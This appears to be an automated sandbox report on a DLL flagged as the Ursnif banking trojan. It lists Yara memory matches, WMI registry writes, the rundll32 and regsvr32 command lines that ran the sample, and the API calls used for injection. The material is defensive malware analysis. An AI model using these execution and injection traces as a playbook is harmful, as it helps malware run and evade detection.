Source: Yara match, file source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

Yara detected Ursnif
Source: Yara match; the file sources are the same memory dumps, process memory spaces and unpacked PEs listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above.
                      Source: Yara matchFile source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: 9091.dll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_100021B4
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D4AFC0
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D47FBE
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D4836E
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00910B68
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00910B6A
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BD7FBE
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BDAFC0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BD836E
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A40B68
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A40B6A
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04A47FBE
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04A4AFC0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04A4836E
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_00BD0B68
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_00BD0B6A
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_0428836E
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_04287FBE
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_0428AFC0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_00B70B6A
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_00B70B68
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_1000129A NtMapViewOfSection
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_1000119D GetProcAddress, NtCreateSection, memset
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_10001540 SetThreadPriority, NtQuerySystemInformation, Sleep, GetLongPathNameW, GetLongPathNameW, GetLongPathNameW, GetLastError, WaitForSingleObject, GetExitCodeThread, CloseHandle, GetLastError, GetLastError
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_100023D5 NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D49A0F NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D4B1E5 NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00910541 NtAllocateVirtualMemory
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00910779 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BD9A0F NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BDB1E5 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A40779 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A40541 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04A49A0F NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04A4B1E5 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_00BD0779 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_00BD0541 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_04289A0F NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_0428B1E5 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_00B70779 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_00B70541 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc.dll
Source: 9091.dll, Static PE information: invalid certificate
Source: 9091.dll, Virustotal: Detection: 22%
Source: 9091.dll, ReversingLabs: Detection: 30%
Source: 9091.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\9091.dll"
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
Source: C:\Windows\System32\loaddll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: classification engine, Classification label: mal100.troj.evad.winDLL@9/0@16/1
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D48F1B CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
Source: C:\Windows\System32\loaddll32.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_100021A3 push ecx; ret 0_2_100021B3
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_10002150 push ecx; ret 0_2_10002159
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D4AC00 push ecx; ret 0_2_00D4AC09
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D4D00C push 00000076h; iretd 0_2_00D4D01A
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D4E62F push edi; retf 0_2_00D4E630
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D4E9AC push 0B565A71h; ret 0_2_00D4E9B1
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D4AFAF push ecx; ret 0_2_00D4AFBF
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00910384 push dword ptr [ebp-00000284h]; ret 0_2_00910540
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_009108B2 push dword ptr [esp+0Ch]; ret 0_2_009108C6
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_009108B2 push dword ptr [esp+10h]; ret 0_2_0091090C
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_009103B6 push dword ptr [ebp-00000284h]; ret 0_2_00910425
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00910725 push edx; ret 0_2_009107C7
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00910725 push dword ptr [esp+10h]; ret 0_2_009108B1
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00910541 push dword ptr [ebp-00000284h]; ret 0_2_00910577
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00910779 push edx; ret 0_2_009107C7
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BDE62F push edi; retf 3_2_02BDE630
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BDD00C push 00000076h; iretd 3_2_02BDD01A
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BDAC00 push ecx; ret 3_2_02BDAC09
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BDE9AC push 0B565A71h; ret 3_2_02BDE9B1
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02BDAFAF push ecx; ret 3_2_02BDAFBF
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A408B2 push dword ptr [esp+0Ch]; ret 3_2_00A408C6
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A408B2 push dword ptr [esp+10h]; ret 3_2_00A4090C
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A403B6 push dword ptr [ebp-00000284h]; ret 3_2_00A40425
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A40384 push dword ptr [ebp-00000284h]; ret 3_2_00A40540
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A40725 push edx; ret 3_2_00A407C7
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A40725 push dword ptr [esp+10h]; ret 3_2_00A408B1
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A40779 push edx; ret 3_2_00A407C7
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_00A40541 push dword ptr [ebp-00000284h]; ret 3_2_00A40577
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04A4E62F push edi; retf 4_2_04A4E630
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04A4AC00 push ecx; ret 4_2_04A4AC09
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_04A4D00C push 00000076h; iretd 4_2_04A4D01A
Source: 9091.dll, Static PE information: section name: .arthros
Source: 9091.dll, Static PE information: section name: .preter
Source: 9091.dll, Static PE information: section name: .witched
Source: 9091.dll, Static PE information: section name: .restitu
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_10001753 LoadLibraryA, GetProcAddress
Source: 9091.dll, Static PE information: real checksum: 0xc73e4 should be: 0xd0994
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9091.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match, File source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
Source: Yara match, File source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.e